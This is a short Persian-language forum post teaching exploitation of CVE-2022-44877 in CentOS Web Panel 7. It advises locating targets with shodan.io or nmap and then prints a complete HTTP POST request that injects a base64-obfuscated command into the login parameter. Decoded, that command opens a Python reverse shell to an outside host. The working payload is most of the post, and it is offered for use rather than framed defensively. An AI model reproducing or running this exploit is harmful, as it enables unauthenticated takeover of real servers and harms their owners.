SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Centos Web Panel 7 Unauthenticated Remote Code Execution

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Centos Web Panel 7 Unauthenticated Remote Code Execution

    آموزش آسیب پذیری موجود در Centos Web Panel نسخه 7 با شماره CVE-2022-44877

    برای شناسایی میتوانید از وب سایت هایی مانند shodan.io یا ابزار nmap استفاده کنید.

    پس از شناسایی و تایید آسیب پذیری موجود دستورات مورد نظر را مانند نمونه زیر به آدرس پنل POST نمایید.


    کد:
    POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcn Qgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0 KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy 5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAy KHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKT tvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5 LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
    Host: 10.13.37.10:2031
    Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1ea upietdk82
    Content-Length: 40
    Origin: https://10.13.37.10:2031
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: https://10.13.37.10:2031/login/index.php?login=failed
    Accept-Encoding: gzip, deflate
    Accept-Language: en
    Connection: close
    
    username=root&password=toor&commit=Login​

    برای دیدن سایز بزرگ روی عکس کلیک کنید

نام: 1.png
مشاهده: 181
حجم: 613.2 کیلو بایت

    توضیحات تکمیلی :

    کد:
    https://github.com/numanturle/CVE-2022-44877
صبر کنید ..
X